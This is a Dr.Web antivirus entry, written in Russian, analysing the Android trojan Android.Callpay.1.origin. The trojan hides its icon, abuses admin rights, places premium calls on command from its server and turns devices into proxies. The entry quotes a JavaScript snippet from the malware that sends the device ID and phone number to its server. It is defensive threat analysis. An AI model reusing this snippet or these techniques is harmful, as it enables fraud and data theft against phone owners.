Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Android.Callpay.1.origin

Added to the Dr.Web virus database: 2016-06-02

Virus description added:

SHA1:

  • fcff7d777b66d1fea71db63505ddf6f75bd71bdc

Android.Callpay.1.origin – это Android-троянец, который представляет собой приложение для просмотра эротических видеороликов, при этом в качестве оплаты за доступ к записям он незаметно для пользователей совершает звонки на премиум-номера.

После установки Android.Callpay.1.origin создает в меню графической оболочки полностью невидимый значок приложения:

screen Android.Callpay.1.origin #drweb

При запуске троянец запрашивает доступ к правам администратора мобильного устройства, чтобы в дальнейшем затруднить свое удаление из системы:

screen Android.Callpay.1.origin #drweb

После получения необходимых полномочий Android.Callpay.1.origin показывает главное окно приложения со списком доступных видеороликов, при этом внизу окна указаны ссылки на пользовательское соглашение и на отказ от использования платной услуги.

screen Android.Callpay.1.origin #drweb screen Android.Callpay.1.origin #drweb

Одновременно с этим троянец выполняет регистрацию управляющего сервера android.hot******.com в сервисе Cloud to Device Messaging, с которого получает команды на автоматическое выполнение дорогостоящих звонков, а также информацию о соответствующих номерах телефонов. Таким образом, после первого запуска Android.Callpay.1.origin владелец мобильного устройства без какого-либо предупреждения по умолчанию становится пользователем платной услуги.

Если жертва пытается отказаться от использования дорогостоящего сервиса, троянец требует предоставить номер мобильного телефона. Для этого он при помощи стандартного компонента WebView платформы Android показывает следующее окно:

screen Android.Callpay.1.origin #drweb

После того как пользователь вводит номер телефона в соответствующую форму, троянец передает на управляющий сервер информацию об идентификаторе устройства и полученном номере телефона, после чего закрывает окно. Решение об аннулировании подписки зависит от настроек сервера

function addBlackList(){
		var device = AndroidFunctionMain.getDeviceId();		
		var phone = $('#phone').val();
		console.log(phone);
		$.ajax({
                data:  'device='+device+'&phone='+phone,
                url:   'add_blacklist.php',
                type:  'POST',
                success:  function (response) {
                        AndroidFunctionMain.finish();
                },
        });
	}

Функция прокси-сервера

Android.Callpay.1.origin использует зараженные смартфоны и планшеты в качестве прокси-сервера. При включении мобильного устройства троянец запускает сервис ProxyService, который через AlarmManager регистрирует отправку PendingIntent каждые 18 секунд. Задача PendingIntent – получать интернет-трафик со стороны сервера злоумышленников и при помощи системы из нескольких сокетов передавать информацию через устройство, используя его в качестве посредника.

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android